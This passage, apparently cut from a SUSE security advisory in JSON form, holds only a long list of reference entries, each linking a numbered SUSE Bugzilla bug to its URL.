"summary": "SUSE Bug 1228490",
"url": "https://bugzilla.suse.com/1228490"
},
{
"category": "self",
"summary": "SUSE Bug 1233563",
"url": "https://bugzilla.suse.com/1233563"
},
{
"category": "self",
"summary": "SUSE Bug 1234163",
"url": "https://bugzilla.suse.com/1234163"
},
{
"category": "self",
"summary": "SUSE Bug 1234842",
"url": "https://bugzilla.suse.com/1234842"
},
{
"category": "self",
"summary": "SUSE Bug 1241437",
"url": "https://bugzilla.suse.com/1241437"
},
{
"category": "self",
"summary": "SUSE Bug 1242909",
"url": "https://bugzilla.suse.com/1242909"
},
{
"category": "self",
"summary": "SUSE Bug 1243677",
"url": "https://bugzilla.suse.com/1243677"
},
{
"category": "self",
"summary": "SUSE Bug 1243678",
"url": "https://bugzilla.suse.com/1243678"
},
{
"category": "self",
"summary": "SUSE Bug 1245193",
"url": "https://bugzilla.suse.com/1245193"
},
{
"category": "self",
"summary": "SUSE Bug 1245449",
"url": "https://bugzilla.suse.com/1245449"
},
{
"category": "self",
"summary": "SUSE Bug 1246184",
"url": "https://bugzilla.suse.com/1246184"
},
{
"category": "self",
"summary": "SUSE Bug 1246328",
"url": "https://bugzilla.suse.com/1246328"
},
{
"category": "self",
"summary": "SUSE Bug 1246447",
"url": "https://bugzilla.suse.com/1246447"
},
{
"category": "self",
"summary": "SUSE Bug 1247030",
"url": "https://bugzilla.suse.com/1247030"
},
{
"category": "self",
"summary": "SUSE Bug 1247500",
"url": "https://bugzilla.suse.com/1247500"
},
{
"category": "self",
"summary": "SUSE Bug 1247712",
"url": "https://bugzilla.suse.com/1247712"
},
{
"category": "self",
"summary": "SUSE Bug 1248211",
"url": "https://bugzilla.suse.com/1248211"
},
{
"category": "self",
"summary": "SUSE Bug 1248886",
"url": "https://bugzilla.suse.com/1248886"
},
{
"category": "self",
"summary": "SUSE Bug 1249256",
"url": "https://bugzilla.suse.com/1249256"
},
{
"category": "self",
"summary": "SUSE Bug 1249307",
"url": "https://bugzilla.suse.com/1249307"
},
{
"category": "self",
"summary": "SUSE Bug 1250032",
"url": "https://bugzilla.suse.com/1250032"
},
{
"category": "self",
"summary": "SUSE Bug 1250082",
"url": "https://bugzilla.suse.com/1250082"
},
{
"category": "self",
"summary": "SUSE Bug 1250334",
"url": "https://bugzilla.suse.com/1250334"
},
{
"category": "self",
"summary": "SUSE Bug 1250388",
"url": "https://bugzilla.suse.com/1250388"
},
{
"category": "self",
"summary": "SUSE Bug 1250705",
"url": "https://bugzilla.suse.com/1250705"
},
{
"category": "self",
"summary": "SUSE Bug 1250748",
"url": "https://bugzilla.suse.com/1250748"
},
{
"category": "self",
"summary": "SUSE Bug 1252046",
"url": "https://bugzilla.suse.com/1252046"
},
{
"category": "self",
"summary": "SUSE Bug 1252342",
"url": "https://bugzilla.suse.com/1252342"
},
{
"category": "self",
"summary": "SUSE Bug 1252511",
"url": "https://bugzilla.suse.com/1252511"
},
{
"category": "self",
"summary": "SUSE Bug 1252686",
"url": "https://bugzilla.suse.com/1252686"
},
{
"category": "self",
"summary": "SUSE Bug 1252712",
"url": "https://bugzilla.suse.com/1252712"
},
{
"category": "self",
"summary": "SUSE Bug 1252776",
"url": "https://bugzilla.suse.com/1252776"
},
{
"category": "self",
"summary": "SUSE Bug 1252808",
"url": "https://bugzilla.suse.com/1252808"
},
{
"category": "self",
"summary": "SUSE Bug 1252824",
"url": "https://bugzilla.suse.com/1252824"
},
{
"category": "self",
"summary": "SUSE Bug 1252861",
"url": "https://bugzilla.suse.com/1252861"
},
{
"category": "self",
"summary": "SUSE Bug 1252891",
"url": "https://bugzilla.suse.com/1252891"
},
{
"category": "self",
"summary": "SUSE Bug 1252900",
"url": "https://bugzilla.suse.com/1252900"
},
{
"category": "self",
"summary": "SUSE Bug 1252919",
"url": "https://bugzilla.suse.com/1252919"
},
{
"category": "self",
"summary": "SUSE Bug 1252973",
"url": "https://bugzilla.suse.com/1252973"
},
{
"category": "self",
"summary": "SUSE Bug 1253087",
"url": "https://bugzilla.suse.com/1253087"
},
{
"category": "self",
"summary": "SUSE Bug 1253155",
"url": "https://bugzilla.suse.com/1253155"
},
{
"category": "self",
"summary": "SUSE Bug 1253262",
"url": "https://bugzilla.suse.com/1253262"
},
{
"category": "self",
"summary": "SUSE Bug 1253342",
"url": "https://bugzilla.suse.com/1253342"
},
{
"category": "self",
"summary": "SUSE Bug 1253365",
"url": "https://bugzilla.suse.com/1253365"
},
{
"category": "self",
"summary": "SUSE Bug 1253386",
"url": "https://bugzilla.suse.com/1253386"
},
{
"category": "self",
"summary": "SUSE Bug 1253400",
"url": "https://bugzilla.suse.com/1253400"
},
{
"category": "self",
"summary": "SUSE Bug 1253402",
"url": "https://bugzilla.suse.com/1253402"
},
{
"category": "self",
"summary": "SUSE Bug 1253408",
"url": "https://bugzilla.suse.com/1253408"
},
{
"category": "self",
"summary": "SUSE Bug 1253413",
"url": "https://bugzilla.suse.com/1253413"
},
{
"category": "self",
"summary": "SUSE Bug 1253442",
"url": "https://bugzilla.suse.com/1253442"
},
{
"category": "self",
"summary": "SUSE Bug 1253451",
"url": "https://bugzilla.suse.com/1253451"
},
{
"category": "self",
"summary": "SUSE Bug 1253458",
"url": "https://bugzilla.suse.com/1253458"
},
{
"category": "self",
"summary": "SUSE Bug 1253463",
"url": "https://bugzilla.suse.com/1253463"
},
{
"category": "self",
"summary": "SUSE Bug 1253623",
"url": "https://bugzilla.suse.com/1253623"
},
{
"category": "self",
"summary": "SUSE Bug 1253647",
"url": "https://bugzilla.suse.com/1253647"
},
{
"category": "self",
"summary": "SUSE Bug 1253739",
"url": "https://bugzilla.suse.com/1253739"
},
{
"category": "self",
"summary": "SUSE Bug 1254119",
"url": "https://bugzilla.suse.com/1254119"
},
{
"category": "self",
"summary": "SUSE Bug 1254126",
"url": "https://bugzilla.suse.com/1254126"
},
{
"category": "self",
"summary": "SUSE Bug 1254244",
"url": "https://bugzilla.suse.com/1254244"
},
{
"category": "self",
"summary": "SUSE Bug 1254373",
"url": "https://bugzilla.suse.com/1254373"
},
{
"category": "self",
"summary": "SUSE Bug 1254378",
"url": "https://bugzilla.suse.com/1254378"
},
{
"category": "self",
"summary": "SUSE Bug 1254447",
"url": "https://bugzilla.suse.com/1254447"
},
{
"category": "self",
"summary": "SUSE Bug 1254465",
"url": "https://bugzilla.suse.com/1254465"
},
{
"category": "self",
"summary": "SUSE Bug 1254510",
"url": "https://bugzilla.suse.com/1254510"
},
{
"category": "self",
"summary": "SUSE Bug 1254518",
"url": "https://bugzilla.suse.com/1254518"
},
{
"category": "self",
"summary": "SUSE Bug 1254520",
"url": "https://bugzilla.suse.com/1254520"
},
{
"category": "self",
"summary": "SUSE Bug 1254599",
"url": "https://bugzilla.suse.com/1254599"
},
{
"category": "self",
"summary": "SUSE Bug 1254606",
"url": "https://bugzilla.suse.com/1254606"
},
{
"category": "self",
"summary": "SUSE Bug 1254611",
"url": "https://bugzilla.suse.com/1254611"
},
{
"category": "self",
"summary": "SUSE Bug 1254613",
"url": "https://bugzilla.suse.com/1254613"
},
{
"category": "self",
"summary": "SUSE Bug 1254615",
"url": "https://bugzilla.suse.com/1254615"
},
{
"category": "self",
"summary": "SUSE Bug 1254621",
"url": "https://bugzilla.suse.com/1254621"
},
{
"category": "self",
"summary": "SUSE Bug 1254623",
"url": "https://bugzilla.suse.com/1254623"
},
{
"category": "self",
"summary": "SUSE Bug 1254624",
"url": "https://bugzilla.suse.com/1254624"
},
{
"category": "self",
"summary": "SUSE Bug 1254626",
"url": "https://bugzilla.suse.com/1254626"
},
{
"category": "self",
"summary": "SUSE Bug 1254648",
"url": "https://bugzilla.suse.com/1254648"
},
{
"category": "self",
"summary": "SUSE Bug 1254649",
"url": "https://bugzilla.suse.com/1254649"
},
{
"category": "self",
"summary": "SUSE Bug 1254653",
"url": "https://bugzilla.suse.com/1254653"
},
{
"category": "self",
"summary": "SUSE Bug 1254655",
"url": "https://bugzilla.suse.com/1254655"
},
{
"category": "self",
"summary": "SUSE Bug 1254657",
"url": "https://bugzilla.suse.com/1254657"
},
{
"category": "self",
"summary": "SUSE Bug 1254660",
"url": "https://bugzilla.suse.com/1254660"
},
{
"category": "self",
"summary": "SUSE Bug 1254661",
"url": "https://bugzilla.suse.com/1254661"
},
{
"category": "self",
"summary": "SUSE Bug 1254663",
"url": "https://bugzilla.suse.com/1254663"
},
{
"category": "self",
"summary": "SUSE Bug 1254669",
"url": "https://bugzilla.suse.com/1254669"
},
{
"category": "self",
"summary": "SUSE Bug 1254677",
"url": "https://bugzilla.suse.com/1254677"
},
{
"category": "self",
"summary": "SUSE Bug 1254678",
"url": "https://bugzilla.suse.com/1254678"
},
{
"category": "self",
"summary": "SUSE Bug 1254688",
"url": "https://bugzilla.suse.com/1254688"
},
{
"category": "self",
"summary": "SUSE Bug 1254690",
"url": "https://bugzilla.suse.com/1254690"
},
{
"category": "self",
"summary": "SUSE Bug 1254691",
"url": "https://bugzilla.suse.com/1254691"
},
{
"category": "self",
"summary": "SUSE Bug 1254693",
"url": "https://bugzilla.suse.com/1254693"
},
{
"category": "self",
"summary": "SUSE Bug 1254695",
"url": "https://bugzilla.suse.com/1254695"
},
{
"category": "self",
"summary": "SUSE Bug 1254698",
"url": "https://bugzilla.suse.com/1254698"
},
{
"category": "self",
"summary": "SUSE Bug 1254701",
"url": "https://bugzilla.suse.com/1254701"
},
{
"category": "self",
"summary": "SUSE Bug 1254704",
"url": "https://bugzilla.suse.com/1254704"
},
{
"category": "self",
"summary": "SUSE Bug 1254705",
"url": "https://bugzilla.suse.com/1254705"
},
{
"category": "self",
"summary": "SUSE Bug 1254707",
"url": "https://bugzilla.suse.com/1254707"
},
{
"category": "self",
"summary": "SUSE Bug 1254712",
"url": "https://bugzilla.suse.com/1254712"
},
{
"category": "self",
"summary": "SUSE Bug 1254715",
"url": "https://bugzilla.suse.com/1254715"
},
{
"category": "self",
"summary": "SUSE Bug 1254717",
"url": "https://bugzilla.suse.com/1254717"
},
{
"category": "self",
"summary": "SUSE Bug 1254723",
"url": "https://bugzilla.suse.com/1254723"
},
{
"category": "self",
"summary": "SUSE Bug 1254724",
"url": "https://bugzilla.suse.com/1254724"
},
{
"category": "self",
"summary": "SUSE Bug 1254732",
"url": "https://bugzilla.suse.com/1254732"
},
{
"category": "self",
"summary": "SUSE Bug 1254733",
"url": "https://bugzilla.suse.com/1254733"
},
{
"category": "self",
"summary": "SUSE Bug 1254737",
"url": "https://bugzilla.suse.com/1254737"
},
{
"category": "self",
"summary": "SUSE Bug 1254739",
"url": "https://bugzilla.suse.com/1254739"
},
{
"category": "self",
"summary": "SUSE Bug 1254742",
"url": "https://bugzilla.suse.com/1254742"
},
{
"category": "self",
"summary": "SUSE Bug 1254743",
"url": "https://bugzilla.suse.com/1254743"
},
{
"category": "self",
"summary": "SUSE Bug 1254749",
"url": "https://bugzilla.suse.com/1254749"
},
{
"category": "self",
"summary": "SUSE Bug 1254750",
"url": "https://bugzilla.suse.com/1254750"
},
{
"category": "self",
"summary": "SUSE Bug 1254753",
"url": "https://bugzilla.suse.com/1254753"
},
{
"category": "self",
"summary": "SUSE Bug 1254754",
"url": "https://bugzilla.suse.com/1254754"
},
{
"category": "self",
"summary": "SUSE Bug 1254758",
"url": "https://bugzilla.suse.com/1254758"
},
{
"category": "self",
"summary": "SUSE Bug 1254761",
"url": "https://bugzilla.suse.com/1254761"
},
{
"category": "self",
"summary": "SUSE Bug 1254762",
"url": "https://bugzilla.suse.com/1254762"
},
{
"category": "self",
"summary": "SUSE Bug 1254765",
"url": "https://bugzilla.suse.com/1254765"
},
{
"category": "self",
"summary": "SUSE Bug 1254767",
"url": "https://bugzilla.suse.com/1254767"
},
{
"category": "self",
"summary": "SUSE Bug 1254782",
"url": "https://bugzilla.suse.com/1254782"
},
{
"category": "self",
"summary": "SUSE Bug 1254791",
"url": "https://bugzilla.suse.com/1254791"
},
{
"category": "self",
"summary": "SUSE Bug 1254793",
"url": "https://bugzilla.suse.com/1254793"
},
{
"category": "self",
"summary": "SUSE Bug 1254794",
"url": "https://bugzilla.suse.com/1254794"
},
{
"category": "self",
"summary": "SUSE Bug 1254795",
"url": "https://bugzilla.suse.com/1254795"
},
{
"category": "self",
"summary": "SUSE Bug 1254796",
"url": "https://bugzilla.suse.com/1254796"
},
{
"category": "self",
"summary": "SUSE Bug 1254797",
"url": "https://bugzilla.suse.com/1254797"
},
{
"category": "self",
"summary": "SUSE Bug 1254798",
"url": "https://bugzilla.suse.com/1254798"
},
{
"category": "self",
"summary": "SUSE Bug 1254813",
"url": "https://bugzilla.suse.com/1254813"
},
{
"category": "self",
"summary": "SUSE Bug 1254815",
"url": "https://bugzilla.suse.com/1254815"
},
{
"category": "self",
"summary": "SUSE Bug 1254825",
"url": "https://bugzilla.suse.com/1254825"
},
{
"category": "self",
"summary": "SUSE Bug 1254828",
"url": "https://bugzilla.suse.com/1254828"
},
{
"category": "self",
"summary": "SUSE Bug 1254829",
"url": "https://bugzilla.suse.com/1254829"
},
{
"category": "self",
"summary": "SUSE Bug 1254830",
"url": "https://bugzilla.suse.com/1254830"
},
{
"category": "self",
"summary": "SUSE Bug 1254832",
"url": "https://bugzilla.suse.com/1254832"
},
{
"category": "self",
"summary": "SUSE Bug 1254835",
"url": "https://bugzilla.suse.com/1254835"
},
{
"category": "self",
"summary": "SUSE Bug 1254839",
"url": "https://bugzilla.suse.com/1254839"
},
{
"category": "self",
"summary": "SUSE Bug 1254840",
"url": "https://bugzilla.suse.com/1254840"
},
{
"category": "self",
"summary": "SUSE Bug 1254842",
"url": "https://bugzilla.suse.com/1254842"
},
{
"category": "self",
"summary": "SUSE Bug 1254843",
"url": "https://bugzilla.suse.com/1254843"
},
{
"category": "self",
"summary": "SUSE Bug 1254845",
"url": "https://bugzilla.suse.com/1254845"
},
{
"category": "self",
"summary": "SUSE Bug 1254846",
"url": "https://bugzilla.suse.com/1254846"
},
{
"category": "self",
"summary": "SUSE Bug 1254847",
"url": "https://bugzilla.suse.com/1254847"
},
{
"category": "self",
"summary": "SUSE Bug 1254849",
"url": "https://bugzilla.suse.com/1254849"
},
{
"category": "self",
"summary": "SUSE Bug 1254850",
"url": "https://bugzilla.suse.com/1254850"
},
{
"category": "self",
"summary": "SUSE Bug 1254851",
"url": "https://bugzilla.suse.com/1254851"
},
{
"category": "self",
"summary": "SUSE Bug 1254852",
"url": "https://bugzilla.suse.com/1254852"
},
{
"category": "self",
"summary": "SUSE Bug 1254854",
"url": "https://bugzilla.suse.com/1254854"
},
{
"category": "self",
"summary": "SUSE Bug 1254856",
"url": "https://bugzilla.suse.com/1254856"
},
{
"category": "self",
"summary": "SUSE Bug 1254858",
"url": "https://bugzilla.suse.com/1254858"
},
{
"category": "self",
"summary": "SUSE Bug 1254860",
"url": "https://bugzilla.suse.com/1254860"
},
{
"category": "self",
"summary": "SUSE Bug 1254864",
"url": "https://bugzilla.suse.com/1254864"
},
{
"category": "self",
"summary": "SUSE Bug 1254869",
"url": "https://bugzilla.suse.com/1254869"
},
{
"category": "self",
"summary": "SUSE Bug 1254871",
"url": "https://bugzilla.suse.com/1254871"
},
{
"category": "self",
"summary": "SUSE Bug 1254894",
"url": "https://bugzilla.suse.com/1254894"
},
{
"category": "self",
"summary": "SUSE Bug 1254918",
"url": "https://bugzilla.suse.com/1254918"
},
{
"category": "self",
"summary": "SUSE Bug 1254957",
"url": "https://bugzilla.suse.com/1254957"
},
{
"category": "self",
"summary": "SUSE Bug 1254959",
"url": "https://bugzilla.suse.com/1254959"
},
{
"category": "self",
"summary": "SUSE Bug 1254983",
"url": "https://bugzilla.suse.com/1254983"
},
{
"category": "self",
"summary": "SUSE Bug 1255005",
"url": "https://bugzilla.suse.com/1255005"
},
{
"category": "self",
"summary": "SUSE Bug 1255009",
"url": "https://bugzilla.suse.com/1255009"
},
{
"category": "self",
"summary": "SUSE Bug 1255025",
"url": "https://bugzilla.suse.com/1255025"
},
{
"category": "self",
"summary": "SUSE Bug 1255026",
"url": "https://bugzilla.suse.com/1255026"
},
{
"category": "self",
"summary": "SUSE Bug 1255030",
"url": "https://bugzilla.suse.com/1255030"
},
{
"category": "self",
"summary": "SUSE Bug 1255033",
"url": "https://bugzilla.suse.com/1255033"
},
{
"category": "self",
"summary": "SUSE Bug 1255034",
"url": "https://bugzilla.suse.com/1255034"
},
{
"category": "self",
"summary": "SUSE Bug 1255035",
"url": "https://bugzilla.suse.com/1255035"
},
{
"category": "self",
"summary": "SUSE Bug 1255039",
"url": "https://bugzilla.suse.com/1255039"
},
{
"category": "self",
"summary": "SUSE Bug 1255041",
"url": "https://bugzilla.suse.com/1255041"
},
{
"category": "self",
"summary": "SUSE Bug 1255042",
"url": "https://bugzilla.suse.com/1255042"
},
{
"category": "self",
"summary": "SUSE Bug 1255046",
"url": "https://bugzilla.suse.com/1255046"
},
{
"category": "self",
"summary": "SUSE Bug 1255057",
"url": "https://bugzilla.suse.com/1255057"
},
{
"category": "self",
"summary": "SUSE Bug 1255062",
"url": "https://bugzilla.suse.com/1255062"
},
{
"category": "self",
"summary": "SUSE Bug 1255064",
"url": "https://bugzilla.suse.com/1255064"
},
{
"category": "self",
"summary": "SUSE Bug 1255065",
"url": "https://bugzilla.suse.com/1255065"
},
{
"category": "self",
"summary": "SUSE Bug 1255068",
"url": "https://bugzilla.suse.com/1255068"
},
{
"category": "self",
"summary": "SUSE Bug 1255072",
"url": "https://bugzilla.suse.com/1255072"
},
{
"category": "self",
"summary": "SUSE Bug 1255075",
"url": "https://bugzilla.suse.com/1255075"
},
{
"category": "self",
"summary": "SUSE Bug 1255077",
"url": "https://bugzilla.suse.com/1255077"
},
{
"category": "self",
"summary": "SUSE Bug 1255081",
"url": "https://bugzilla.suse.com/1255081"
},
{
"category": "self",
"summary": "SUSE Bug 1255082",
"url": "https://bugzilla.suse.com/1255082"
},
{
"category": "self",
"summary": "SUSE Bug 1255083",
"url": "https://bugzilla.suse.com/1255083"
},
{
"category": "self",
"summary": "SUSE Bug 1255092",
"url": "https://bugzilla.suse.com/1255092"
},
{
"category": "self",
"summary": "SUSE Bug 1255094",
"url": "https://bugzilla.suse.com/1255094"
},
{
"category": "self",
"summary": "SUSE Bug 1255095",
"url": "https://bugzilla.suse.com/1255095"
},
{
"category": "self",
"summary": "SUSE Bug 1255100",
"url": "https://bugzilla.suse.com/1255100"
},
{
"category": "self",
"summary": "SUSE Bug 1255102",
"url": "https://bugzilla.suse.com/1255102"
},
{
"category": "self",
"summary": "SUSE Bug 1255120",
"url": "https://bugzilla.suse.com/1255120"
},
{
"category": "self",
"summary": "SUSE Bug 1255122",
"url": "https://bugzilla.suse.com/1255122"
},
{
"category": "self",
"summary": "SUSE Bug 1255128",
"url": "https://bugzilla.suse.com/1255128"
},
{
"category": "self",
"summary": "SUSE Bug 1255131",
"url": "https://bugzilla.suse.com/1255131"
},
{
"category": "self",
"summary": "SUSE Bug 1255134",
"url": "https://bugzilla.suse.com/1255134"
},
{
"category": "self",
"summary": "SUSE Bug 1255135",
"url": "https://bugzilla.suse.com/1255135"
},
{
"category": "self",
"summary": "SUSE Bug 1255136",
"url": "https://bugzilla.suse.com/1255136"
},
{
"category": "self",
"summary": "SUSE Bug 1255138",
"url": "https://bugzilla.suse.com/1255138"
},
{
"category": "self",
"summary": "SUSE Bug 1255140",
"url": "https://bugzilla.suse.com/1255140"
},
{
"category": "self",
"summary": "SUSE Bug 1255142",
"url": "https://bugzilla.suse.com/1255142"
},
{
"category": "self",
"summary": "SUSE Bug 1255146",
"url": "https://bugzilla.suse.com/1255146"
},
{
"category": "self",
"summary": "SUSE Bug 1255149",
"url": "https://bugzilla.suse.com/1255149"
},
{
"category": "self",
"summary": "SUSE Bug 1255152",
"url": "https://bugzilla.suse.com/1255152"
},
{
"category": "self",
"summary": "SUSE Bug 1255154",
"url": "https://bugzilla.suse.com/1255154"
},
{
"category": "self",
"summary": "SUSE Bug 1255155",
"url": "https://bugzilla.suse.com/1255155"
},
{
"category": "self",
"summary": "SUSE Bug 1255157",
"url": "https://bugzilla.suse.com/1255157"
},
{
"category": "self",
"summary": "SUSE Bug 1255163",
"url": "https://bugzilla.suse.com/1255163"
},
{
"category": "self",
"summary": "SUSE Bug 1255164",
"url": "https://bugzilla.suse.com/1255164"
},
{
"category": "self",
"summary": "SUSE Bug 1255167",
"url": "https://bugzilla.suse.com/1255167"
},
{
"category": "self",
"summary": "SUSE Bug 1255169",
"url": "https://bugzilla.suse.com/1255169"
},
{
"category": "self",
"summary": "SUSE Bug 1255171",
"url": "https://bugzilla.suse.com/1255171"
},
{
"category": "self",
"summary": "SUSE Bug 1255172",
"url": "https://bugzilla.suse.com/1255172"
},
{
"category": "self",
"summary": "SUSE Bug 1255175",
"url": "https://bugzilla.suse.com/1255175"
},
{
"category": "self",
"summary": "SUSE Bug 1255179",
"url": "https://bugzilla.suse.com/1255179"
},
{
"category": "self",
"summary": "SUSE Bug 1255182",
"url": "https://bugzilla.suse.com/1255182"
},
{
"category": "self",
"summary": "SUSE Bug 1255187",
"url": "https://bugzilla.suse.com/1255187"
},
{
"category": "self",
"summary": "SUSE Bug 1255190",
"url": "https://bugzilla.suse.com/1255190"
},
{
"category": "self",
"summary": "SUSE Bug 1255193",
"url": "https://bugzilla.suse.com/1255193"
},
{
"category": "self",
"summary": "SUSE Bug 1255197",
"url": "https://bugzilla.suse.com/1255197"
},
{
"category": "self",
"summary": "SUSE Bug 1255199",
"url": "https://bugzilla.suse.com/1255199"
},
{
"category": "self",
"summary": "SUSE Bug 1255202",
"url": "https://bugzilla.suse.com/1255202"
},
{
"category": "self",
"summary": "SUSE Bug 1255203",
"url": "https://bugzilla.suse.com/1255203"
},
{
"category": "self",
"summary": "SUSE Bug 1255206",
"url": "https://bugzilla.suse.com/1255206"
},
{
"category": "self",
"summary": "SUSE Bug 1255209",
"url": "https://bugzilla.suse.com/1255209"
},
{
"category": "self",
"summary": "SUSE Bug 1255216",
"url": "https://bugzilla.suse.com/1255216"
},
{
"category": "self",
"summary": "SUSE Bug 1255218",
"url": "https://bugzilla.suse.com/1255218"
},
{
"category": "self",
"summary": "SUSE Bug 1255221",
"url": "https://bugzilla.suse.com/1255221"
},
{
"category": "self",
"summary": "SUSE Bug 1255224",
"url": "https://bugzilla.suse.com/1255224"
},
{
"category": "self",
"summary": "SUSE Bug 1255227",
"url": "https://bugzilla.suse.com/1255227"
},
{
"category": "self",
"summary": "SUSE Bug 1255230",
"url": "https://bugzilla.suse.com/1255230"
},
{
"category": "self",
"summary": "SUSE Bug 1255233",
"url": "https://bugzilla.suse.com/1255233"
},
{
"category": "self",
"summary": "SUSE Bug 1255241",
"url": "https://bugzilla.suse.com/1255241"
},
{
"category": "self",
"summary": "SUSE Bug 1255245",
"url": "https://bugzilla.suse.com/1255245"
},
{
"category": "self",
"summary": "SUSE Bug 1255246",
"url": "https://bugzilla.suse.com/1255246"
},
{
"category": "self",
"summary": "SUSE Bug 1255251",
"url": "https://bugzilla.suse.com/1255251"
},
{
"category": "self",
"summary": "SUSE Bug 1255252",
"url": "https://bugzilla.suse.com/1255252"
},
{
"category": "self",
"summary": "SUSE Bug 1255253",
"url": "https://bugzilla.suse.com/1255253"
},
{
"category": "self",
"summary": "SUSE Bug 1255255",
"url": "https://bugzilla.suse.com/1255255"
},
{
"category": "self",
"summary": "SUSE Bug 1255259",
"url": "https://bugzilla.suse.com/1255259"
},
{
"category": "self",
"summary": "SUSE Bug 1255260",
"url": "https://bugzilla.suse.com/1255260"
},
{
"category": "self",
"summary": "SUSE Bug 1255261",
"url": "https://bugzilla.suse.com/1255261"
},
{
"category": "self",
"summary": "SUSE Bug 1255262",
"url": "https://bugzilla.suse.com/1255262"
},
{
"category": "self",
"summary": "SUSE Bug 1255266",
"url": "https://bugzilla.suse.com/1255266"
},
{
"category": "self",
"summary": "SUSE Bug 1255268",
"url": "https://bugzilla.suse.com/1255268"
},
{
"category": "self",
"summary": "SUSE Bug 1255269",
"url": "https://bugzilla.suse.com/1255269"
},
{
"category": "self",
"summary": "SUSE Bug 1255272",
"url": "https://bugzilla.suse.com/1255272"
},
{
"category": "self",
"summary": "SUSE Bug 1255273",
"url": "https://bugzilla.suse.com/1255273"
},
{
"category": "self",
"summary": "SUSE Bug 1255274",
"url": "https://bugzilla.suse.com/1255274"
},
{
"category": "self",
"summary": "SUSE Bug 1255276",
"url": "https://bugzilla.suse.com/1255276"
},
{
"category": "self",
"summary": "SUSE Bug 1255279",
"url": "https://bugzilla.suse.com/1255279"
},
{
"category": "self",
"summary": "SUSE Bug 1255280",
"url": "https://bugzilla.suse.com/1255280"
},
{
"category": "self",
"summary": "SUSE Bug 1255281",
"url": "https://bugzilla.suse.com/1255281"
},
{
"category": "self",
"summary": "SUSE Bug 1255297",
"url": "https://bugzilla.suse.com/1255297"
},
{
"category": "self",
"summary": "SUSE Bug 1255318",
"url": "https://bugzilla.suse.com/1255318"
},
{
"category": "self",
"summary": "SUSE Bug 1255325",
"url": "https://bugzilla.suse.com/1255325"
},
{
"category": "self",
"summary": "SUSE Bug 1255327",
"url": "https://bugzilla.suse.com/1255327"
},
{
"category": "self",
"summary": "SUSE Bug 1255329",
"url": "https://bugzilla.suse.com/1255329"
},
{
"category": "self",
"summary": "SUSE Bug 1255351",
"url": "https://bugzilla.suse.com/1255351"
},
{
"category": "self",
"summary": "SUSE Bug 1255377",
"url": "https://bugzilla.suse.com/1255377"
},
{
"category": "self",
"summary": "SUSE Bug 1255380",
"url": "https://bugzilla.suse.com/1255380"
},
{
"category": "self",
"summary": "SUSE Bug 1255395",
"url": "https://bugzilla.suse.com/1255395"
},
{
"category": "self",
"summary": "SUSE Bug 1255401",
"url": "https://bugzilla.suse.com/1255401"
},
{
"category": "self",
"summary": "SUSE Bug 1255403",
"url": "https://bugzilla.suse.com/1255403"
},
{
"category": "self",
"summary": "SUSE Bug 1255415",
"url": "https://bugzilla.suse.com/1255415"
},
{
"category": "self",
"summary": "SUSE Bug 1255417",
"url": "https://bugzilla.suse.com/1255417"
},
{
"category": "self",
"summary": "SUSE Bug 1255428",
"url": "https://bugzilla.suse.com/1255428"
},
{
"category": "self",
"summary": "SUSE Bug 1255480",
"url": "https://bugzilla.suse.com/1255480"
},
{
"category": "self",
"summary": "SUSE Bug 1255482",
"url": "https://bugzilla.suse.com/1255482"
},
{
"category": "self",
"summary": "SUSE Bug 1255483",
"url": "https://bugzilla.suse.com/1255483"
},
{
"category": "self",
"summary": "SUSE Bug 1255488",
"url": "https://bugzilla.suse.com/1255488"
},
{
"category": "self",
"summary": "SUSE Bug 1255489",
"url": "https://bugzilla.suse.com/1255489"
},
{
"category": "self",
"summary": "SUSE Bug 1255493",
"url": "https://bugzilla.suse.com/1255493"
},
{
"category": "self",
"summary": "SUSE Bug 1255495",
"url": "https://bugzilla.suse.com/1255495"
},
{
"category": "self",
"summary": "SUSE Bug 1255505",
"url": "https://bugzilla.suse.com/1255505"
},
{
"category": "self",
"summary": "SUSE Bug 1255507",
"url": "https://bugzilla.suse.com/1255507"
},
{
"category": "self",
"summary": "SUSE Bug 1255537",
"url": "https://bugzilla.suse.com/1255537"
},
{
"category": "self",
"summary": "SUSE Bug 1255538",
"url": "https://bugzilla.suse.com/1255538"
},
{
"category": "self",
"summary": "SUSE Bug 1255539",
"url": "https://bugzilla.suse.com/1255539"
},
{
"category": "self",
"summary": "SUSE Bug 1255540",
"url": "https://bugzilla.suse.com/1255540"
},
{
"category": "self",
"summary": "SUSE Bug 1255544",
"url": "https://bugzilla.suse.com/1255544"
},
{
"category": "self",
"summary": "SUSE Bug 1255545",
"url": "https://bugzilla.suse.com/1255545"
},
{
"category": "self",
"summary": "SUSE Bug 1255547",
"url": "https://bugzilla.suse.com/1255547"
},
{
"category": "self",
"summary": "SUSE Bug 1255548",
"url": "https://bugzilla.suse.com/1255548"
},
{
"category": "self",
"summary": "SUSE Bug 1255549",
"url": "https://bugzilla.suse.com/1255549"
},
{
"category": "self",
"summary": "SUSE Bug 1255550",
"url": "https://bugzilla.suse.com/1255550"
},
{
"category": "self",
"summary": "SUSE Bug 1255552",
"url": "https://bugzilla.suse.com/1255552"
},
{
"category": "self",
"summary": "SUSE Bug 1255553",
"url": "https://bugzilla.suse.com/1255553"
},
{
"category": "self",
"summary": "SUSE Bug 1255557",
"url": "https://bugzilla.suse.com/1255557"
},
{
"category": "self",
"summary": "SUSE Bug 1255558",
"url": "https://bugzilla.suse.com/1255558"
},
{
"category": "self",
"summary": "SUSE Bug 1255563",
"url": "https://bugzilla.suse.com/1255563"
},
{
"category": "self",
"summary": "SUSE Bug 1255564",
"url": "https://bugzilla.suse.com/1255564"
},
{
"category": "self",
"summary": "SUSE Bug 1255567",
"url": "https://bugzilla.suse.com/1255567"
},
{
"category": "self",
"summary": "SUSE Bug 1255568",
"url": "https://bugzilla.suse.com/1255568"
},
{
"category": "self",
"summary": "SUSE Bug 1255569",
"url": "https://bugzilla.suse.com/1255569"
},
{
"category": "self",
"summary": "SUSE Bug 1255570",
"url": "https://bugzilla.suse.com/1255570"
},
{
"category": "self",
"summary": "SUSE Bug 1255578",
"url": "https://bugzilla.suse.com/1255578"
},
{
"category": "self",
"summary": "SUSE Bug 1255579",
"url": "https://bugzilla.suse.com/1255579"
},
{
"category": "self",
"summary": "SUSE Bug 1255580",
"url": "https://bugzilla.suse.com/1255580"
},
{
"category": "self",
"summary": "SUSE Bug 1255583",
"url": "https://bugzilla.suse.com/1255583"
},
{
"category": "self",
"summary": "SUSE Bug 1255591",
"url": "https://bugzilla.suse.com/1255591"
},
{
"category": "self",
"summary": "SUSE Bug 1255601",
"url": "https://bugzilla.suse.com/1255601"
},
{
"category": "self",
